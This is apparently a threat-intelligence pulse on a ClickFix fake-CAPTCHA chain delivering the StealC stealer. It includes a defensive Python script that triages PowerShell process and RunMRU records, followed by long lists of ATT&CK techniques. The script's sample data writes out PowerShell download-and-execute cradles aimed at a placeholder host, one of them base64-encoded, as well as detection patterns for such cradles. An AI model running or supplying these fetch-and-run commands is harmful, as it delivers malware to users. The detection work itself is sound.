How ClickFix Opens the Door to Stealthy StealC Information Stealer
Overview
This analysis examines a multi-stage attack chain that targets Windows systems through social engineering. A fake CAPTCHA verification page (the ClickFix lure) instructs the user to run a malicious PowerShell command. That command starts an infection chain of PowerShell scripts, position-independent shellcode and a PE downloader, which rely on reflective PE loading, API hashing and process injection to evade detection. The final payload is StealC, a commodity information stealer that harvests browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials and system information. StealC encrypts its C2 communication and establishes no persistence, which makes it particularly stealthy.
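The first stage of this chain, the pasted PowerShell one-liner, is the part that ordinary endpoint telemetry still sees: the later stages run as shellcode and a reflectively loaded PE that never touch disk. The Python triage script below is an added example, not code from the original report or from the StealC operators. It scores constructed process-creation records (Sysmon event 1 / Security 4688 style fields) and a constructed dump of the Run dialog's RunMRU registry history for the ClickFix pattern: explorer.exe spawning powershell.exe with a hidden window, an execution-policy bypass, a download cradle and in-memory execution, including payloads hidden behind -EncodedCommand. The sample command lines, the fake-captcha.example domain, and the indicator weights and threshold are illustrative assumptions, not indicators from this pulse.

```python
r"""Triage helper for ClickFix-style initial execution (added example, not from the report).

ClickFix lures have the victim paste a command into the Win+R Run dialog, so the first
PowerShell process is a child of explorer.exe and usually carries a one-liner that fetches
and runs the next stage in memory.  Two places to look: process-creation telemetry (Sysmon
event 1 / Security 4688) and the Run dialog's own history under
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which keeps what was pasted.
"""
import base64
import re

# ---- constructed sample data; fake-captcha.example is a placeholder domain ----
NEXT_STAGE = "IEX (New-Object Net.WebClient).DownloadString('https://fake-captcha.example/v.txt')"
ENCODED = base64.b64encode(NEXT_STAGE.encode("utf-16-le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    # ClickFix: pasted into Win+R, so explorer.exe is the parent
    {"parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (irm https://fake-captcha.example/verify.txt)"'},
    # Same lure, cradle hidden behind -EncodedCommand
    {"parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE,
     "cmdline": f"powershell -WindowStyle Hidden -enc {ENCODED}"},
    # Benign: build tooling running a script file
    {"parent": r"C:\Program Files\Git\bin\bash.exe", "image": PS_IMAGE,
     "cmdline": r"powershell -NoProfile -File .\build.ps1"},
]
# Constructed RunMRU dump: every value ends in "\1"; MRUList is most-recent-first.
SAMPLE_RUNMRU = {"a": r"notepad\1",
                 "b": r'powershell -w hidden -c "iex (irm https://fake-captcha.example/verify.txt)"\1',
                 "MRUList": "ba"}

# -e, -ec, -enc, -encodedcommand ... but not -ep (ExecutionPolicy) or -ex.
ENC_RE = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Illustrative weights and threshold; tune against your own baseline.
INDICATORS = [
    (3, "download cradle", re.compile(
        r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b", re.I)),
    (2, "in-memory execution", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    (2, "hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    (1, "execution policy bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
]
THRESHOLD = 6


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def score_event(parent, image, cmdline):
    """Score one process-creation record; returns (score, reasons)."""
    reasons = []
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    score = 0
    if parent.lower().endswith("explorer.exe"):
        score += 3
        reasons.append("launched from explorer.exe (Run dialog / shell)")
    text, decoded = cmdline, decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command: " + decoded)
        text += " " + decoded  # match indicators inside the decoded payload too
    for weight, label, rx in INDICATORS:
        if rx.search(text):
            score += weight
            reasons.append(label)
    return score, reasons


def triage_events(events):
    """Return the records at or above THRESHOLD, with the reasons that fired."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev["parent"], ev["image"], ev["cmdline"])
        if score >= THRESHOLD:
            hits.append({"cmdline": ev["cmdline"], "score": score, "reasons": reasons})
    return hits


def runmru_history(values):
    """Order a RunMRU dump by MRUList (most recent first), stripping the '\\1' suffix."""
    history = []
    for key in values.get("MRUList", ""):
        entry = values.get(key)
        if entry is not None:
            history.append(entry[:-2] if entry.endswith("\\1") else entry)
    return history


def triage_runmru(values):
    """Score Run-dialog history; explorer.exe is the implied parent of every entry."""
    records = [{"parent": r"C:\Windows\explorer.exe", "image": PS_IMAGE, "cmdline": cmd}
               for cmd in runmru_history(values) if "powershell" in cmd.lower()]
    return triage_events(records)


if __name__ == "__main__":
    for hit in triage_events(SAMPLE_EVENTS) + triage_runmru(SAMPLE_RUNMRU):
        print(hit["score"], hit["reasons"])
```

Run it directly to print the flagged records. The RunMRU key is worth collecting during incident response because it preserves the pasted command even after the PowerShell process and any downloaded stage are gone. Pair the process-creation view with PowerShell Script Block Logging (event 4104), which records the decoded script content, and with memory scanning for the injected stages, which this script cannot see.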
Created: 2026-03-20
Indicators
Similar Pulses
No similar pulses were found.
Threat actors related to this pulse (fact-based)
Score: 43.71
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1021.002 - SMB/Windows Admin Shares
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1546.008 - Accessibility Features
- T1552.001 - Credentials In Files
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1203 - Exploitation for Client Execution
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Score: 50.75
Matched TTPs:
- T1053.005 - Scheduled Task
- T1548.002 - Bypass User Account Control
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1219 - Remote Access Tools
- T1055 - Process Injection
- T1218.003 - CMSTP
- T1218.008 - Odbcconf
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1220 - XSL Script Processing
Score: 34.11
Matched TTPs:
- T1053.005 - Scheduled Task
- T1113 - Screen Capture
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1106 - Native API
- T1055 - Process Injection
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
Score: 55.67
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1114.001 - Local Email Collection
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1106 - Native API
- T1021.002 - SMB/Windows Admin Shares
- T1021.006 - Windows Remote Management
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1589.001 - Credentials
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1556.001 - Domain Controller Authentication
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
Score: 42.23
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1548.002 - Bypass User Account Control
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1203 - Exploitation for Client Execution
- T1197 - BITS Jobs
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1102.001 - Dead Drop Resolver
Score: 20.47
Matched TTPs:
- T1053.005 - Scheduled Task
- T1218.011 - Rundll32
- T1003.002 - Security Account Manager
- T1574.001 - DLL
- T1059.001 - PowerShell
- T1195.002 - Compromise Software Supply Chain
- T1036.003 - Rename Legitimate Utilities
- T1012 - Query Registry
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
Score: 85.82
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1587.001 - Malware
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1620 - Reflective Code Loading
- T1562.004 - Disable or Modify System Firewall
- T1674 - Input Injection
- T1059 - Command and Scripting Interpreter
- T1218.005 - Mshta
- T1608.005 - Link Target
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1497.002 - User Activity Based Checks
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1195.002 - Compromise Software Supply Chain
- T1102.002 - Bidirectional Communication
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
Score: 25.85
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1055 - Process Injection
- T1588.001 - Malware
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1518.001 - Security Software Discovery
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 35.58
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1003.002 - Security Account Manager
- T1574.001 - DLL
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1036.003 - Rename Legitimate Utilities
- T1570 - Lateral Tool Transfer
- T1059.003 - Windows Command Shell
- T1105 - Ingress Tool Transfer
Score: 100.62
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1491.002 - External Defacement
- T1539 - Steal Web Session Cookie
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1213.006 - Databases
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1040 - Network Sniffing
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1195 - Supply Chain Compromise
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1090 - Proxy
- T1584.005 - Botnet
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1486 - Data Encrypted for Impact
- T1592.002 - Software
- T1195.002 - Compromise Software Supply Chain
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1499 - Endpoint Denial of Service
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 70.02
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1543.003 - Windows Service
- T1140 - Deobfuscate/Decode Files or Information
- T1562 - Impair Defenses
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1583.003 - Virtual Private Server
- T1491.001 - Internal Defacement
- T1134.003 - Make and Impersonate Token
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1570 - Lateral Tool Transfer
- T1614.001 - System Language Discovery
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
Score: 40.04
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1583.002 - DNS Server
- T1204.002 - Malicious File
- T1608.001 - Upload Malware
- T1555 - Credentials from Password Stores
- T1010 - Application Window Discovery
- T1555.003 - Credentials from Web Browsers
- T1589.002 - Email Addresses
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1534 - Internal Spearphishing
- T1588.002 - Tool
- T1102.002 - Bidirectional Communication
- T1027.010 - Command Obfuscation
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
Score: 90.97
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1176.002 - IDE Extensions
- T1059 - Command and Scripting Interpreter
- T1219.001 - IDE Tunneling
- T1070 - Indicator Removal
- T1102 - Web Service
- T1218.005 - Mshta
- T1027.012 - LNK Icon Smuggling
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1678 - Delay Execution
- T1588.002 - Tool
- T1027 - Obfuscated Files or Information
- T1203 - Exploitation for Client Execution
- T1001.003 - Protocol or Service Impersonation
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1027.007 - Dynamic API Resolution
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 79.79
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1114.001 - Local Email Collection
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1562 - Impair Defenses
- T1190 - Exploit Public-Facing Application
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1090 - Proxy
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1486 - Data Encrypted for Impact
- T1573 - Encrypted Channel
- T1592.002 - Software
- T1589.001 - Credentials
- T1102.002 - Bidirectional Communication
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1566.003 - Spearphishing via Service
Score: 55.87
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1587.001 - Malware
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1021.006 - Windows Remote Management
- T1003.001 - LSASS Memory
- T1087 - Account Discovery
- T1552.001 - Credentials In Files
- T1657 - Financial Theft
- T1134.003 - Make and Impersonate Token
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1556 - Modify Authentication Process
- T1090.001 - Internal Proxy
Score: 22.37
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1106 - Native API
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1566.003 - Spearphishing via Service
Score: 28.92
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1218.011 - Rundll32
- T1543.003 - Windows Service
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1090 - Proxy
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1059.003 - Windows Command Shell
- T1134 - Access Token Manipulation
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
Score: 16.94
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1140 - Deobfuscate/Decode Files or Information
- T1555.003 - Credentials from Web Browsers
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 40.45
Matched TTPs:
- T1053.005 - Scheduled Task
- T1218.011 - Rundll32
- T1003 - OS Credential Dumping
- T1484.002 - Trust Modification
- T1190 - Exploit Public-Facing Application
- T1059.009 - Cloud API
- T1552.004 - Private Keys
- T1021.006 - Windows Remote Management
- T1657 - Financial Theft
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1486 - Data Encrypted for Impact
- T1218.010 - Regsvr32
- T1614.001 - System Language Discovery
- T1518.001 - Security Software Discovery
- T1219.002 - Remote Desktop Software
Score: 76.15
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1548.002 - Bypass User Account Control
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1586.003 - Cloud Accounts
- T1190 - Exploit Public-Facing Application
- T1059.009 - Cloud API
- T1505.003 - Web Shell
- T1090.002 - External Proxy
- T1546.008 - Accessibility Features
- T1649 - Steal or Forge Authentication Certificates
- T1553.005 - Mark-of-the-Web Bypass
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1573 - Encrypted Channel
- T1203 - Exploitation for Client Execution
- T1059.006 - Python
- T1027.006 - HTML Smuggling
- T1070.004 - File Deletion
- T1651 - Cloud Administration Command
- T1105 - Ingress Tool Transfer
- T1665 - Hide Infrastructure
- T1566.003 - Spearphishing via Service
Score: 75.20
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1059.010 - AutoHotKey & AutoIT
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1547.009 - Shortcut Modification
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1059 - Command and Scripting Interpreter
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1056 - Input Capture
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1197 - BITS Jobs
- T1059.006 - Python
- T1546.010 - AppInit DLLs
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1090.001 - Internal Proxy
Score: 39.20
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1021.002 - SMB/Windows Admin Shares
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1055.004 - Asynchronous Procedure Call
- T1102 - Web Service
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 76.09
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1003.002 - Security Account Manager
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1055 - Process Injection
- T1518.002 - Backup Software Discovery
- T1021.002 - SMB/Windows Admin Shares
- T1021 - Remote Services
- T1112 - Modify Registry
- T1021.006 - Windows Remote Management
- T1003.001 - LSASS Memory
- T1547.004 - Winlogon Helper DLL
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1197 - BITS Jobs
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1555.004 - Windows Credential Manager
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
Score: 29.12
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1001.003 - Protocol or Service Impersonation
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1220 - XSL Script Processing
- T1090.001 - Internal Proxy
Score: 91.52
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1546.008 - Accessibility Features
- T1090 - Proxy
- T1059.001 - PowerShell
- T1071.002 - File Transfer Protocols
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1486 - Data Encrypted for Impact
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1595.003 - Wordlist Scanning
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1197 - BITS Jobs
- T1656 - Impersonation
- T1213.003 - Code Repositories
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1480.001 - Environmental Keying
- T1102.001 - Dead Drop Resolver
Score: 10.49
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
Score: 58.21
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1548.002 - Bypass User Account Control
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1112 - Modify Registry
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1090 - Proxy
- T1588.001 - Malware
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1588.002 - Tool
- T1584.006 - Web Services
- T1027 - Obfuscated Files or Information
- T1027.003 - Steganography
- T1059.006 - Python
- T1189 - Drive-by Compromise
- T1059.005 - Visual Basic
Score: 57.55
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1003 - OS Credential Dumping
- T1491.002 - External Defacement
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1195 - Supply Chain Compromise
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1021 - Remote Services
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1588.001 - Malware
